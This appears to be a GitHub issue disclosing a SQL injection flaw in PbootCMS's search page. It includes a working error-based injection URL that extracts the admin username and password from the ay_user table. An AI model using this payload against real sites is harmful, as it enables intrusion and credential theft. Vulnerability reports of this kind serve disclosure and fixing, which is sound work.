You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql
The default database is sqlite. For testing convenience, we need to replace the default database with the mysql database.
the mysql database directory:
Pbootcms-master\static\backup\sql\20180720164810_pbootcms.sql
SQL injection happened in this page.
payload:
http://127.0.0.1:89/index.php/Search/index.html?keyword=1&if(1>0,(select/**/1/**/and/**/extractvalue(1,concat(0x7e,(SELECT/**/concat(0x23,username,0x3a,password,0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e))),'3'));%23=1
and we can get the admin account name and password
The text was updated successfully, but these errors were encountered: